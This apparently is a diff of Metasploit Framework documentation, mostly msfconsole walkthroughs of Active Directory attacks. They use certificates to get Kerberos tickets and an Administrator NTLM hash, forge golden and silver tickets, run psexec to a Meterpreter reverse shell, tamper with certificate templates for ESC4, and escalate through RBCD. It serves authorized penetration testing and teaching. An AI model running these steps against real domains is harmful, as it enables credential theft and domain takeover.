+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:88 - Received a valid TGT-Response
+[*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_324339.bin
+[*] 172.30.239.85:88 - Getting NTLM hash for Administrator@daforest.com
+[+] 172.30.239.85:88 - Received a valid TGS-Response
+[*] 172.30.239.85:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_031414.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) >
+```
+
+### Getting A Kerberos Ticket
+Certificates can be used to issue a Kerberos ticket granting ticket (TGT) which in turn can be used to authenticate to
+services such as HTTP, LDAP and SMB. Ticket granting tickets can be requested using the `GET_TGT` action.
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:88 - Getting TGT for Administrator@daforest.com
+[+] 172.30.239.85:88 - Received a valid TGT-Response
+[*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/kerberos/get_ticket) > klist
 Kerberos Cache
 ==============
-host            principal               sname                             issued                     status  path
----            ---------               -----                             ------                     ------  ----
-192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+host           principal                   sname                             issued                     status  path
+----           ---------                   -----                             ------                     ------  ----
+172.30.239.85  Administrator@daforest.com  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin

 msf6 auxiliary(admin/kerberos/get_ticket) >
 ```

 Once the TGT has been issued, it can be seen in the output of the `klist` command. With the TGT saved, it will
 automatically be used in the future to request ticket granting services (TGS) for authentication to specific services.
+
+## Authenticating To LDAP
+Certificates can also be used to directly authenticate to LDAP using schannel. Metasploit modules that use the builtin
+LDAP library (including `auxiliary/gather/ldap_query`) offer this as an authentication option that can be enabled. To
+use schannel authentication a few options must be set.
+
+* `LDAP::Auth` -- must be set to `schannel`
+* `LDAP::CertFile` -- must be set to the PFX certificate file with which to authenticate
+* `SSL` -- must be set to `true` (`schannel` authentication is only compatible with TLS connections)
+
+```msf
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(gather/ldap_query) > set LDAP::Auth schannel
+LDAP::Auth => schannel
+msf6 auxiliary(gather/ldap_query) > set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+LDAP::CertFile => /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+msf6 auxiliary(gather/ldap_query) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/ldap_query) > enum_domain
+[*] Running module against 172.30.239.85
+
+[*] Discovering base DN automatically
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] 172.30.239.85:389 Discovered schema DN: DC=daforest,DC=com
+DC=msflab DC=local
+==================
+
+ Name                       Attributes
+ ----                       ----------
+ lockoutduration            0:00:30:00
+ lockoutthreshold           0
+ maxpwdage                  42:00:00:00
+ minpwdage                  1:00:00:00
+ minpwdlength               7
+ ms-ds-machineaccountquota  10
+ name                       msflab
+ objectsid                  S-1-5-21-3402587289-1488798532-3618296993
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
@@ -2,7 +2,7 @@

 This is a guide for setting up a developer environment to contribute modules, documentation, and fixes to the Metasploit Framework. If you just want to use Metasploit for legal, authorized hacking, we recommend instead you:

- - Install the [open-source Omnibus installer][open-source-installer], or
+ - Install the [[open-source Omnibus installer|./nightly-installers.md]], or
 - Use the pre-installed Metasploit on [Kali Linux][kali-user-instructions] or [Parrot Linux][parrot-user-instructions].

 If you want to contribute to Metasploit, start by reading our [CONTRIBUTING.md], then follow the rest of this guide.
@@ -155,7 +155,7 @@ cd ~/git/metasploit-framework
 $ ./msfconsole -qx "db_status; exit"
 ```

-Congratulations! You have now set up the [Metasploit Web Service (REST API)][msf-web-service] and the backend database.
+Congratulations! You have now set up the [[Metasploit Web Service (REST API)|./metasploit-web-service.md]] and the backend database.

 ## Optional: Tips to speed up common workflows

@@ -167,7 +167,7 @@ Making sure you're in the right directory to run `msfconsole` can become tedious
 echo 'alias msfconsole="pushd $HOME/git/metasploit-framework && ./msfconsole && popd"' >> ~/.bash_aliases
 ```

-Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [how][signing-howto]. Once you have done this, consider enabling automatic signing of all your commits with the following command:
+Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [[how|./committer-keys.md#signing-your-commits-and-merges]]. Once you have done this, consider enabling automatic signing of all your commits with the following command:

 ```
 cd *path to your cloned MSF repository on disk*
@@ -176,7 +176,7 @@ git config commit.gpgsign true

 Developers tend to customize their own [git aliases] to speed up common commands, but here are a few common ones:

-```rc
+```
 [alias]
 # An easy, colored oneline log format that shows signed/unsigned status
 nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<%aE>%Creset [%G?]'
@@ -212,12 +212,11 @@ You should see over 9000 tests run, mostly resulting in green dots, a few in yel

 # Great!  Now what?

-We're excited to see your upcoming contributions of new modules, documentation, and fixes!  Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
+We're excited to see your upcoming contributions of new modules, documentation, and fixes! If you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.

 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

 [commercial-installer]:http://metasploit.com/download
-[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
 [parrot-user-instructions]:https://parrotsec.org/docs/installation.html
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
@@ -240,14 +239,10 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [find]:https://linux.die.net/man/1/find
 [$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable

-[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html
-
 [git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
-[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto

 [git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
 [rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/
-[wiki-documentation]:https://docs.metasploit.com/#metasploit-development
 [newbie-friendly-prs-issues]:https://github.com/rapid7/metasploit-framework/issues?q=is%3Aopen+label%3Anewbie-friendly
 [howto-PR]:https://help.github.com/articles/about-pull-requests/
 [new issue]:https://github.com/rapid7/metasploit-framework/issues/new/choose
@@ -1,7 +1,7 @@
 # This file maps the files within `metasploit-framework.wiki/` to the navigational menu
 # Modify this file to change the doc site's navigation/hierarchy

-# @param path [String] the prefix to remove from a string
+# @param prefix [String] The prefix to remove from a string
 # @return [proc<String, String>] When called with a string, the returned string has the prefix removed
 def without_prefix(prefix)
  proc { |value| value.sub(/^#{prefix}/, '') }
@@ -183,6 +183,10 @@ NAVIGATION_CONFIG = [
              {
                path: '../../documentation/modules/auxiliary/admin/kerberos/ticket_converter.md',
                title: 'Converting kirbi and ccache files'
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
+                title: 'RBCD - Resource-based constrained delegation'
              }
            ]
          },
@@ -193,20 +197,26 @@ NAVIGATION_CONFIG = [
              {
                path: 'ad-certificates/overview.md',
                title: 'Overview',
-                nav_order: 0,
+                nav_order: 0
+              },
+              {
+                path: 'ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md',
+                title: 'Attacking AD CS ESC Vulnerabilities Using Metasploit',
+                nav_order: 1
+              },
+              {
+                path: '../../documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md',
+                title: 'Vulnerable cert finder',
+                nav_order: 2
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md',
+                title: 'Manage certificate templates'
              },
              {
                path: '../../documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md',
                title: 'Request certificates'
-              },
-              {
-                path: '../../documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md',
-                title: 'Vulnerable cert finder'
-              },
-              {
-                path: 'ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md',
-                title: 'Attacking AD CS ESC Vulnerabilities Using Metasploit'
-              },
+              }
            ]
          }
        ]
@@ -522,6 +532,10 @@ NAVIGATION_CONFIG = [
              {
                path: 'How-to-use-command-stagers.md'
              },
+              {
+                path: 'How-to-use-fetch-payloads.md',
+                title: 'How to use Fetch Payloads'
+              },
              {
                old_wiki_path: 'How-to-write-a-check()-method.md',
                path: 'How-to-write-a-check-method.md'
@@ -601,10 +615,6 @@ NAVIGATION_CONFIG = [
                path: 'How-to-use-the-Seh-mixin-to-exploit-an-exception-handler.md',
                title: 'SEH Exploitation'
              },
-              {
-                path: 'How-to-clean-up-files-using-FileDropper.md',
-                title: 'FileDropper'
-              },
              {
                path: 'How-to-use-PhpEXE-to-exploit-an-arbitrary-file-upload-bug.md',
                title: 'PhpExe'
@@ -691,6 +701,10 @@ NAVIGATION_CONFIG = [
                path: 'Using-ReflectiveDLL-Injection.md',
                title: 'ReflectiveDLL Injection'
              },
+              {
+                path: 'How-to-cleanup-after-module-execution.md',
+                title: 'Cleanup'
+              },
            ]
          },
          {
@@ -820,6 +834,9 @@ NAVIGATION_CONFIG = [
          },
          {
            path: 'Loading-Test-Modules.md'
+          },
+          {
+            path: 'Measuring-Metasploit-Performance.md'
          }
        ]
      },
@@ -1,3 +1,7 @@
+# Folder Purpose
+This folder is primarily used to hold documentation for Metasploit's various modules, as well as the developers guide
+at `developers_guide.pdf`.
+
 # Metasploit Developer Documentation

 Metasploit is actively supported by a community of hundreds of
@@ -19,7 +23,7 @@ treasures there, such as:
 ## API Documentation

 If you are looking for API documentation, you may run `rake yard` to
-generate a navigatable view of the comment documentation used throughout
+generate a navigable view of the comment documentation used throughout
 Metasploit, or visit https://rapid7.github.io/metasploit-framework/api
 for a recently generated online version.

@@ -56,19 +56,30 @@ The user's AES key to use for Kerberos authentication in hex string. Supported
 keys: 128 or 256 bits.

 ### SPN
-The Service Principal Name, the format is `service_name/FQDN` . Ex:
-cifs/dc01.mydomain.local. This option is only used when requesting a TGS.
+
+This option is only used when requesting a TGS.
+
+The Service Principal Name, the format is `service_name/FQDN`.
+Ex: cifs/dc01.mydomain.local.

 ### IMPERSONATE
 The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to
 request the ticket).

 ### KrbUseCachedCredentials
+
+This option is only used when requesting a TGS.
+
 If set to `true`, it looks for a matching TGT in the database and, if found,
-use it for Kerberos authentication when requesting a TGS. Note that this option
-only applies to `GET_TGS` action and has no effect on the `GET_TGT` action.
+use it for Kerberos authentication when requesting a TGS.
 Default is `true`.

+### Krb5Ccname
+
+This option is only used when requesting a TGS.
+
+The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked'
+
 ## Scenarios

 ### Requesting a TGT
@@ -283,3 +294,42 @@ host             service  type                 name  content                   i
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea          /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
 ```
+
+TGS using a previously forged golden ticket:
+
+```
+# Forge a golden ticket
+msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator
+
+[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
+[*] Auxiliary module execution completed
+
+
+# Request a silver ticket:
+
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
+[*] Running module against 10.10.11.5
+
+[*] 10.10.11.5:88 - Using cached credential for krbtgt/DEV.DEMO.LOCAL@DEV.DEMO.LOCAL Administrator@DEV.DEMO.LOCAL
+[*] 10.10.11.5:88 - Getting TGS for Administrator@dev.demo.local (SPN: cifs/dc02.dev.demo.local)
+[+] 10.10.11.5:88 - Received a valid TGS-Response
+[*] 10.10.11.5:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin
+[+] 10.10.11.5:88 - Received a valid delegation TGS-Response
+[*] Auxiliary module execution completed
+
+# Use psexec:
+
+msf6 exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 10.10.11.5:445 - Connecting to the server...
+[*] 10.10.11.5:445 - Authenticating to 10.10.11.5:445|dev.demo.local as user 'Administrator'...
+[*] 10.10.11.5:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin
+[*] 10.10.11.5:445 - Selecting PowerShell target
+[*] 10.10.11.5:445 - Executing the payload...
+[+] 10.10.11.5:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 10.10.11.5
+
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 10.10.11.5:60625) at 2023-03-09 12:08:49 +0000
+meterpreter >
+```
@@ -0,0 +1,221 @@
+## RBCD Exploitation
+
+This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain Controller.
+
+The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be restored using
+the CREATE or UPDATE actions.
+
+In order for the `auxiliary/admin/ldap/ad_cs_cert_template` module to succeed, the authenticated user must have the 
+necessary permissions to perform the specified action on the target object (the certificate specified in
+`CERT_TEMPLATE`).
+
+## Lab setup
+
+Follow the steps in the [[Installing AD CS|ad-certificates/overview.md#installing-ad-cs]] documentation.
+
+## Module usage
+
+The `admin/ldap/ad_cs_template` module is generally used to update a certificate template as part of an ESC4 attack.
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/ldap/ad_cs_cert_template`
+3. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
+4. Set the `CERT_TEMPLATE` option to the name of the target certificate template
+5. Set the `ACTION`
+   b. For the `UPDATE` action, set the `TEMPLATE_FILE` option
+   c. For the `CREATE` action, optionally set the `TEMPLATE_FILE` option
+6. Run the module and see the operation complete successfully
+
+## Actions
+
+### CREATE
+Create the certificate template in the LDAP server. If no `TEMPLATE_FILE` is specified, a new certificate template will
+be created based on the Microsoft-builtin `SubCA` template with a default security descriptor. If the `TEMPLATE_FILE` is
+specified, the attributes it defines are merged with the `SubCA` template. This allows attributes such as the security
+descriptor and name to be defined.
+
+### READ
+Read the certificate template from the LDAP server. A copy will be saved to disk.
+
+### UPDATE
+Update the certificate template in the LDAP server. The `TEMPLATE_FILE` must be specified and will be used to read
+attributes to set on the certificate template object. The `TEMPLATE_FILE` option can be set to a previously stored
+template file to restore the object to a previous state.
+
+### DELETE
+Delete the certificate template in the LDAP server. This is a destructive action.
+
+## Options
+
+### CERT_TEMPLATE
+The remote certificate template name. This is used as the common name (CN) for the LDAP object.
+
+### TEMPLATE_FILE
+This is a local template file from which to read object attributes from. Two file formats are supported, JSON and YAML.
+The file format is determined by the extension so the file must end in either `.json` or `.yaml`.
+
+#### The JSON format
+The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with
+[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies fo certificate to
+disk.
+
+#### The YAML format
+The YAML file format is similiar to the JSON file format, but takes advantage of YAML's ability to include comments.
+The file consists of a hash with attribute name keys and value strings. The `nTSecurityDescriptor` file can be either
+a binary string representing a literal value, or a security descriptor defined in Microsoft's [Security Descriptor
+Definition Language (SDDL)][sddl]. Premade configuration templates provided by Metasploit use this format.
+
+## Scenarios
+
+For steps on exploiting ESC4, see [[Exploiting ESC4|ad-certificates/attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges]].
+
+### Creating A Certificate Template
+
+In this scenario, the operator uses the module to create a new certificate template. Either the default local template
+can be used to make one vulnerable to ESC1, or a previously saved configuration can be used. In the following example,
+the `TEMPLATE_FILE` option is used to restore the settings from a previously deleted template.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION CREATE
+ACTION => CREATE
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json
+TEMPLATE_FILE => /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 192.168.159.10:389 Getting root DSE
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] Creating: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+```
+
+### Deleting A Certificate Template
+
+In this scenario, the operator uses the module to delete the `ESC4-Test` certificate template. A backup of the original
+certificate's data is made before it is deleted. This file can be used with the `CREATE` action to restore the
+certificate template.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION DELETE 
+ACTION => DELETE
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 192.168.159.10:389 Getting root DSE
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
+```
+
+### Reading A Certificate Template
+
+In this scenario, the operator uses the module to read the configuration of the default `User` certificate template.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION READ
+ACTION => READ
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 192.168.159.10:389 Getting root DSE
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505125728_default_192.168.159.10_windows.ad.cs.te_691087.json
+[*] Certificate Template:
+[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*]   displayName:       User
+[*]   objectGUID:        ceed9142-d00f-459e-9694-02eb59ea1ec8
+[*]   msPKI-Certificate-Name-Flag: 0xa6000000
+[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
+[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
+[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
+[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+[*]   msPKI-Enrollment-Flag: 0x00000029
+[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
+[*]     * CT_FLAG_PUBLISH_TO_DS
+[*]     * CT_FLAG_AUTO_ENROLLMENT
+[*]   msPKI-RA-Signature: 0x00000000
+[*]   pKIExtendedUsage:
+[*]     * 1.3.6.1.4.1.311.10.3.4
+[*]     * 1.3.6.1.5.5.7.3.4
+[*]     * 1.3.6.1.5.5.7.3.2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+```
+
+### Updating A Certificate Template
+
+In this scenario, the operator uses the module to update and reconfigure the `ESC4-Test` certificate template to make it
+vulnerable to ESC1 (the default template settings). This process first makes a backup of the certificate data that can
+be used later. The local certificate template data can be modified to set a custom security descriptor.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE 
+ACTION => UPDATE
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true 
+VERBOSE => true
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 192.168.159.10:389 Getting root DSE
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_192.168.159.10_windows.ad.cs.te_593597.json
+[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+```
+
+[certipy]: https://github.com/ly4k/Certipy
+[sddl]: https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language
@@ -1,17 +1,86 @@
-## Vulnerable Application
+## RBCD Exploitation

-This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
-Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
-DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
-write access to the target object (the object specified in DELEGATE_TO).
+If an account has the ability to write to the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute against a target, i.e. having
+`GenericWrite` privileges, this can be abused for privilege escalation.

-## Verification Steps
+The `auxiliary/admin/ldap/rbcd` module can be used to read and write the `msDS-AllowedToActOnBehalfOfOtherIdentity` LDAP attribute against a target
+for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry (ACE) to allow the account specified in
+`DELEGATE_FROM` to the object specified in `DELEGATE_TO`. For privilege escalation - the `auxiliary/admin/kerberos/get_ticket` module can then
+be used to request a new Kerberos S4U impersonation ticket for the Administrator account.
+
+In order for the `auxiliary/admin/ldap/rbcd` module to succeed, the authenticated user must have write access to the target object (the object specified in `DELEGATE_TO`).
+
+## Lab setup
+
+For the RBCD attack to work an Active Directory account (i.e. `sandy`) is required with write privileges to the target computer (i.e. `WS01`).
+
+From an admin powershell prompt, first create a new Active Directory account, `sandy`, in your Active Directory environment:
+
+```powershell
+# Create a basic user account
+net user /add sandy Password1!
+
+# Mark the sandy and password as never expiring, to ensure the lab setup still works in the future
+net user sandy /expires:never
+Set-AdUser -Identity sandy -PasswordNeverExpires:$true
+```
+
+Grant Write privileges for sandy to the target machine, i.e. `WS01`:
+
+```powershell
+# Remember to change WS01 to the name of your target Computer (i.e. the output of the hostname command)
+$TargetComputer = Get-ADComputer 'WS01'
+$User = Get-ADUser 'sandy'
+
+# Add GenericWrite access to the user against the target coputer
+$Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
+$ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
+$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
+$GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType
+$TargetComputerAcl = Get-Acl "AD:$($TargetComputer.DistinguishedName)"
+$TargetComputerAcl.AddAccessRule($GenericWriteAce)
+Set-Acl -AclObject $TargetComputerAcl -Path "AD:$($TargetComputer.DistinguishedName)"
+```
+
+Finally Verify the Write privileges for the sandy account:
+
+```powershell
+PS C:\Users\administrator> $TargetComputer = Get-ADComputer 'WS01'
+PS C:\Users\administrator> (Get-ACL "AD:$($TargetComputer.DistinguishedName)").Access| Where-Object { $_.IdentityReference -Match 'sandy' }
+
+ActiveDirectoryRights : GenericWrite
+InheritanceType       : All
+ObjectType            : 00000000-0000-0000-0000-000000000000
+InheritedObjectType   : 00000000-0000-0000-0000-000000000000
+ObjectFlags           : None
+AccessControlType     : Allow
+IdentityReference     : MSFLAB\sandy
+IsInherited           : False
+InheritanceFlags      : ContainerInherit
+PropagationFlags      : None
+```
+
+## Module usage
+
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
